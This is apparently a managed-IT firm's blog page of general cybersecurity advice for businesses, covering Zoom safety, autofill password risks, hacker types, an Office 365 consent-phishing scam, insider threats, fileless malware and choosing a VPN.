cybersecurity

How to Implement Better Cyber Hygiene Practices as Employees Work Remotely

How to Implement Better Cyber Hygiene Practices as Employees Work Remotely

Erik Haas, director of sales and marketing was interviewed for ASAE and offered some basic measures that organizations should take to improve their cybersecurity posture.  designDATA, AHT Insurance, and Hartman Executive Advisors share their perspectives with ASAE on how to mitigate cybersecurity risk in a remote work environment:

https://www.asaecenter.org/resources/articles/an_plus/2020/april/how-to-implement-better-cyber-hygiene-practices-as-employees-work-remote/?MessageRunDetailID=1718343401&PostID=14279524&utm_medium=email&utm_source=rasa_io

Phishing Scams Aim to Exploit Coronavirus Fears

How To Keep Uninvited Guests Out of Your Zoom Event

Zoom is a videotelephony and online chat services through a cloud-based peer-to-peer software platform and is used for teleconferencing, telecommuting, distance education, and social relations.  With most of the country working from home and using Zoom as well as other cloud-based communications there has been an uptick in hacking stories.  So, what are we to do?  Let’s look at a few ways we can practice Zoom Safety. At designDATA we believe the following best practices will help:

  • Create separate passwords for each virtual meeting;
  • Establish a Zoom waiting room for meeting participants
  • Lockdown the meeting once everyone invited to attend has joined
  • Do not publicly post-meeting links on social media or any other public forum

Why autocomplete passwords are risky

Many people use auto-fill passwords for their convenience. What you might not know is that hackers and advertisers can use them to get access to websites and other applications and gather sensitive information. Learn more about the risks of using autocomplete passwords.

Why auto-fill passwords are so dangerous

Certain web browsers have integrated features that enable usernames and passwords to be automatically entered into a web form. There are also password manager applications that have made it easy to access login credentials. But these aren’t completely safe. They can become a liability if hackers gain access to computers or browsers.

For example, if a hacker gains access to just one account, it’ll be easier for them to obtain access to other accounts because the autocomplete feature will fill in all other saved credentials.

Tricking a browser or password manager into giving up saved information is incredibly simple. All a hacker needs to do is place an invisible form on a compromised webpage to collect users’ login information.

Using auto-fill to track users

For over a decade, there’s been a password security tug-of-war between hackers and cybersecurity professionals. Little do users know that shrewd digital marketers also use password auto-fill to track user activity.

Digital marketing groups AdThink and OnAudience have been placing these invisible login forms on websites to monitor the sites that users visit. AdThink and OnAudience track people based on the usernames in hidden auto-fill forms and sell the information they gather to advertisers. While the intention is not to steal passwords, there’s always the likelihood of exposure.

One simple security tip for today

A quick and effective way to improve your account security is to turn off auto-fill in your web browser. Here’s how to do it:

  • If you’re using Chrome – Open the Settings window, click Advanced, and select the appropriate settings under Manage Passwords.
  • If you’re using Firefox – Open the Options window, click Privacy, and under the History heading, select “Firefox will: Use custom settings for history.” In the new window, disable “Remember search and form history.”
  • If you’re using Safari – Open the Preferences window, select the Auto-fill tab, and turn off all the features related to usernames and passwords.

Being cautious about your password security habits can go a long way in protecting your sensitive data. For managed, 24/7 cybersecurity assistance that goes far beyond protecting your privacy, call us today.

3 Hacker types you need to know about

What do you call someone who hunts for security gaps in computer hardware and software? A hacker, right? What about someone who executes a vulnerability test and presents their findings to software vendors to help them improve the quality of their products? There is more than one type of hacker, and understanding the difference is important.

A complicated history

In the 1950s, the term “hacker” was vaguely defined. As computers became more accessible, the word was used to describe someone who explored the details and limits of computer technology by testing them from a variety of angles.

But by the 1980s, hackers became associated with teenagers who were caught breaking into government computer systems — partially because that is what they called themselves, and partially because the word hacker has an inherently aggressive ring to it.

Today, several of those pioneering hackers run multimillion-dollar cybersecurity consulting businesses, while countless others run amok online, hoping to make a quick buck off of hapless victims.

“Black hat” hackers

Closer to the definition that most people outside the IT world know and use, black hat hackers create programs and campaigns to commit all sorts of malicious acts. Crimes such as identity theft, credit card fraud, and extortion are for their sole benefit, but they can also work under the auspices of a corporation or a state and commit espionage and cyberterrorism.

During the 1990s, Kevin Mitnick was a prime example of a black hat hacker. Mitnick went on a two-and-half-year hacking spree wherein he committed wire fraud and stole millions of dollars of data from telecom companies and the National Defense warning system.

After paying his debt to society by spending five years in prison, he set up his own eponymous cybersecurity firm and became its CEO and Chief White Hat Hacker.

“White hat” hackers

Sometimes referred to as ethical hackers or plain old network security specialists, these are the good guys. Whether it’s selling what they find to hardware and software vendors in “bug bounty” programs or working as full-time technicians, white hat hackers are just interested in making an honest buck.

Linus Torvalds is a great example of a white hat hacker. After years of experimenting with the Sinclair QDOS operating system on his Sinclair QL, he released Linux, a secure open-source operating system.

“Gray hat” hackers

Whether someone is a security specialist or a cybercriminal, the majority of their work is usually conducted over the internet. This anonymity affords them opportunities to try their hands at both white hat and black hat hacking.

For example, Marcus Hutchins is a known gray hat hacker. He’s most famous for testing the WannaCry ransomware until he found a way to stop it.

During the day, Hutchins works for the Kryptos Logic cybersecurity firm, but the US government believes he spent his free time creating the Kronos banking malware. He was arrested in 2017 and branded a “gray hat” hacker.

Defend against this new Office 365 threat

Some hackers have become so skilled that they don’t even need you to give up your credentials to hack into your account. One recent cyberthreat is targeted towards users of Microsoft Office 365. You don’t want to be the next victim, so read up.

A phishing scam that harvests users’ credentials

The latest cyberattack on Microsoft Office 365 involves harvesting users’ credentials. Scammers use this previously unseen tactic by launching a phishing message to users, asking them to click on an embedded link. What makes this scam more insidious than traditional phishing scams is that the URL within the message links to a real Microsoft login page.

How does it work?

The phishing message resembles a legitimate SharePoint and OneDrive file-share that prompts users to click on it. Once they do, they are taken to an Office 365 login page where they will be asked to log in if they haven’t already.

After they’ve logged in, they’ll be prompted to grant permission to an app called “0365 Access.” Users who grant permission effectively give the app — and the hackers behind it — complete access to their Office 365 files, contacts, and inbox.

This technique can easily trick lots of users since the app that requests access is integrated with the Office 365 Add-ins feature. That means that Microsoft essentially generates the request for permission. No, Microsoft is not aiding hackers to breach systems. Rather, the scam is made possible by a feature that allows users to install apps that are not from the official Office Store.

Ways to protect your Office 365 account — and your business

Given their fairly advanced approach, these scammers could effortlessly prey on careless employees. There are ways to make sure that doesn’t happen.

  • Always check the email’s sender account before clicking on any link or granting apps access.
  • Implement a policy that prevents staff from downloading and installing apps that are not from the Office Store.
  • Regularly conduct security awareness training that covers essential cybersecurity topics. Educate employees on how to spot phishing scam red flags (e.g., unknown senders, grammatical and typographical errors, suspicious requests, and the like). Increase their knowledge about more sophisticated attacks and keep everyone informed about current and future cybersecurity risks.

Successful attacks could result in an unimaginable catastrophe to your company. For tips on how to spot this and other nefarious scams and how to plan thorough security practices, contact our experts today.

Mitigating cybersecurity insider threats

Did you know that in some industries the biggest cybersecurity threats come from inside a breached organization? Sometimes it’s motivated by financial gain and sometimes it’s plain-old ignorance. So how can you protect your organization from insider threats?

#1 Educate

You must teach your team to recognize personally identifiable information (PII) and understand the financial implications of a breach. Each employee needs to grasp the risks associated with violating specific state or federal regulations regarding data privacy and security. For example, when a celebrity is admitted to the hospital, employees may be tempted to sneak a peek at their medical records. As innocent as that may seem, it could result in a hefty HIPAA fine.

#2 Deter

You must put easy-to-understand policies in place to prevent an insider from breaching company data. And those policies must be strictly enforced. In fact, almost every regulatory framework pertaining to data security requires that these policies are published where they can be easily found and that you present them in company-wide meetings. In some case, you may be forced to put a person in charge of holding everyone in the company accountable to following the policies.

#3 Detect

Businesses must have systems in place to identify data breaches and their sources as quickly as possible. You should be able to see any time someone accessed PII. This speeds up the breach response time by revealing when unauthorized personnel viewed something they shouldn’t have. It’s significantly easier to stem the spread of a breach with an effective audit trail in place.

#4 Investigate

When a privacy or security breach is detected, certain actions must be taken to limit the damages. For example, after the cause of a breach has been identified, your team should create new policies and procedures to ensure it can’t happen a second time. In the case of an insider threat, that might mean revoking data access privileges to a department that never actually needed them.

#5 Train

Since IT systems are constantly evolving and easy to accidentally bypass, your employees must undergo regular data security training. A one-day seminar is a great start, but incorporating short, weekly reminders or activities will go a long way toward keeping everything fresh in their minds. Consider using a variety of media, such as emails, break-room posters, and even face-to-face interviews.

Is your company’s data secure from insider threats? Call us today for a quick chat with one of our experts for more information.

Cybersecurity for small- and medium-sized businesses

Has your organization been hit with a data breach or ransomware recently? This happens more often than you might think to businesses of all sizes. Given the frequency, complexity, and increasing number of threats, a multi-level, agile, and cutting-edge cybersecurity strategy is the only response that will protect businesses from massive losses. Fortunately, managed IT services providers (MSPs) are filling this gap with solutions and expertise that even small businesses can afford.

The numbers

According to the Ponemon Institute’s 2018 State of Cybersecurity in Small & Medium Size Businesses (SMBs) survey, cyber attacks on SMBs have increased from 61 percent in 2017 to 67 percent in 2018. Only 28 percent of these SMBs evaluated their ability to mitigate threats, vulnerabilities, and attacks as highly effective. 58 percent of SMBs in the study experienced a data breach in the last year.
Most SMBs in Ponemon’s research said attacks against their companies had severe financial consequences. For instance, the report cited that many of them spent an average of $1.43 million because of the damage or breach of IT resources, a 33 percent increase from 2017. Disruption to operations also cost an average of $1.56 million, a 25 percent increase from 2017.

The attacks

So what types of cyberattacks on SMBs were prevalent last 2018? According to the study, the order from most to least common are as follows: phishing/social engineering, web-based attacks, general malware, compromised/stolen devices, denial of services, advanced malware/zero day attacks, SQL injection, malicious insider, cross-site scripting, and uncategorized attacks.

Why managed services?

Partnering with MSPs is the most effective way to prevent attacks and protect your business from these malicious threats. They include a full range of proactive IT support that focuses on advanced security, such as around the clock monitoring, data encryption and backup, real-time threat prevention and elimination, network and firewall protection, security awareness training, and more.
Not only that, but because managed services are designed to identify and fix weak spots in your IT infrastructure, you’ll optimize the digital backbone of your business processes. You’ll have faster network performance, a business continuity and disaster recovery strategy, as well as minimal downtime. One of the best things about managed services is that you get a dedicated team of IT professionals ready to assist you for any technology problems you may encounter. This is much more effective and budget-friendly than having in-house personnel handling all your IT issues.

Being proactive when it comes to cybersecurity is the only way to protect what you’ve worked hard to build. If you’d like to know more about how managed services can benefit your business, just give us a call, we’re sure to help.

Published with permission from TechAdvisory.org. Source.
a-closer-look

A closer look at fileless malware

To avoid detection by antimalware programs, cybercriminals are increasingly abusing legitimate software tools and legitimate programs in systems to steal data or ruin its integrity. They use fileless malware to infiltrate trusted applications and issue executables that blend in with normal network traffic or IT/system administration tasks while leaving fewer footprints. Ultimately, your business could be at risk. Let’s see why.

What is fileless malware?

Fileless malware is stored in random access memory (RAM) instead of on the hard drive. In a typical fileless infection, payloads can be injected into the memory of existing software or applications by running scripts within whitelisted or authenticated applications such as PowerShell, which is designed to automate system administration tasks such as view all USB devices, drives, and services installed in the system, schedule a series of demands, or terminate processes (i.e., Task Manager).

Because there are no files to trace, fileless malware escapes detection from most antimalware programs, especially those that use databases of precedents. Furthermore, most automated sensors cannot recognize illicit scripts, and cybersecurity analysts who are trained to identify them usually have a difficult time establishing where to start looking. Fileless malware isn’t as visible compared to traditional malware. They employ a variety of techniques to stay persistent, and can adversely affect the integrity of a business’s process and the infrastructures that run them.

Fileless malware by the numbers

Cybersecurity firm Kaspersky Lab first discovered a type of fileless malware on its very own network a couple of years ago. The final verdict was that it originated from the Stuxnet strain of state-sponsored cyber warfare. The high level of sophistication and government funding meant fileless malware was virtually nonexistent until the beginning of 2017.

In November 2016, attacks using fileless malware saw an uptick of 13% according to a report. In the same quarter, attacks surged 33% compared to the first quarter. During the first quarter of 2017, more PowerShell-related attacks were reported on more than 12,000 unique machines.

Kaspersky Lab uncovered over 140 infections across 40 different countries. Almost every instance of the fileless malware was found in financial institutions and worked towards obtaining login credentials. In the worst cases, infections had already gleaned enough information to allow cyberattackers to withdraw undisclosed sums of cash from ATMs.

In 2018, cybersecurity firm Trend Micro detected a rising trend of fileless threats throughout the first half of the year.

Is your business at risk?

It is unlikely your business would have been targeted in the earliest stages of this particular strain of malware, but it’s better to be safe than sorry. Businesses should practice defense in depth, where multilayered safeguards are implemented to reduce exposure and mitigate damage. But apart from cultivating a security-aware workforce, what actionable countermeasures can organizations do?

While your business might not be in immediate danger, you should employ solutions that analyze trends in behavior. It is also wise to invest in a managed service provider that offers 24/7 network monitoring, proper patches, and software updates. Call today to get started.

The dangers of autocomplete passwords

Hackers have found a new way to track you online. Aside from using advertisements and suggestions, they can now use autocomplete passwords to track you down. Feeling unsecure? Here are some ways to keep you out of harm’s way.

Why auto-fill passwords are so dangerous

As of December 2018, there are 4.1 billion internet users in the world. This means users have to create dozens of passwords, either to protect their account or simply to meet the password-creation requirements of the platform they’re using. Unfortunately, only 20% of US internet users have different passwords for their multiple online accounts.
Certain web browsers have integrated a mechanism that enables usernames and passwords to be automatically entered into a web form. On the other hand, password manager applications have made it easy to access login credentials. But these aren’t completely safe.
Tricking a browser or password manager into giving up this saved information is incredibly simple. All a hacker needs to do is place an invisible form on a compromised webpage to collect users’ login information.

Using auto-fill to track users

For over a decade, there’s been a password security tug-of-war between hackers and cybersecurity professionals. Little do many people know that shrewd digital marketers also use password auto-fill to track user activity.

Digital marketing groups AdThink and OnAudience have been placing these invisible login forms on websites to track the sites that users visit. They’ve made no attempts to steal passwords, but security professionals said it wouldn’t have been hard for them to do. AdThink and OnAudience simply tracked people based on the usernames in hidden auto-fill forms and sold the information they gathered to advertisers.

One simple security tip for today

A quick and effective way to improve your account security is to turn off auto-fill in your web browser. Here’s how to do it:

  • If you’re using Chrome – Open the Settings window, click Advanced, and select the appropriate settings under Manage Passwords.
  • If you’re using Firefox – Open the Options window, click Privacy, and under the History heading, select “Firefox will: Use custom settings for history.” In the new window, disable “Remember search and form history.”
  • If you’re using Safari – Open the Preferences window, select the Auto-fill tab, and turn off all the features related to usernames and passwords.

This is just one small thing you can do to keep your accounts and the information they contain safe. For managed, 24×7 cybersecurity assistance that goes far beyond protecting your privacy, call us today.

Benefits of using a VPN

While using a virtual private network or VPN isn’t a silver bullet to online privacy threats, it still offers crucial security benefits, especially if any part of your day involves using unsecured channels such as public Wi-Fi. Given its importance, how do you pick the right one and what factors do you need to consider?

What is a VPN?

The best way to describe a VPN is as a secure tunnel between your device and destinations you visit on the internet. Once you’ve established your PC’s connection to a VPN server, your computer acts as if it’s on the same local connection as the VPN making it seem you moved to a different location. As far as websites are concerned, you’re browsing from that server’s geographical location, not your computer’s actual location.

When you surf the web through a VPN, all the data transmitted and received is also encrypted, preventing anyone — from hackers to government agencies — from monitoring your online activities.

Why should you have one?

Of course, security and privacy are major reasons why you would want a VPN. For example, if you’re connected to a public Wi-Fi network — like the ones you typically encounter at local cafes and airports — using a VPN encrypts the information you’re sending or accessing online. This means your credit card details, login credentials, private conversations, or other sensitive documents can’t be intercepted by a third party.

VPNs are also useful for accessing geo-restricted websites. If you’re traveling abroad and certain US websites are blocked in that region, you can connect to a VPN located in the US to access the sites you need.

Which VPN should you choose?

Given the increasing demand for secure online privacy, VPNs are surging in popularity. The following considerations can help you find the right one.

1. Cost
While free VPNs are available, we strongly suggest you avoid them as they could keep logs of your internet activity, and in some cases sell them to data brokers or worse, cybercriminals.

Maintaining a VPN service is also expensive, which means the free ones will likely plaster ads on your browser to make a quick buck.

Paid VPNs like SurfEasy and StrongVPN often come with more robust features and configurations that keep you secure. Prices differ depending on a VPN’s features and subscription length, and remember that how you pay is also important. Some VPNs offer anonymous payment systems like bitcoin while others allow you to use gift cards to avoid giving out your personal information.

2. Location
The physical location of VPN servers is important if you want to access region-blocked websites. So if you’re planning on accessing a UK-based service, your VPN provider must at least have servers installed in London.

3. Capacity
Read through a VPN provider’s terms of service to determine how much data you’re allowed to use. If possible, find out how many servers a VPN provider has. If they have plenty of servers online, you can rest assured that they have the capacity to support your internet browsing.

4. Device compatibility
Another important factor to consider is whether the VPN can be used across multiple devices. Nowadays, employees work on laptops, tablets, and smartphones, so you’ll want a VPN that’s compatible with all these.

5. IP leaking
Beyond the fundamental nuts and bolts of the VPN protocol, there are other challenges like dealing with leaky tunnels, which means your IP address could be tracked. A great way to evaluate a VPN service is to sign up for their free trial service and visit https://ipleak.net. This will allow you to check whether your real IP address is actually being leaked. If it tracks your physical location, you should opt for a more reliable VPN service.

VPNs are now a vital component of cybersecurity, and if you need help selecting the right one for your business, consult with our security experts today. We also offer comprehensive cybersecurity services so no hacker or third party can get their hands on your data.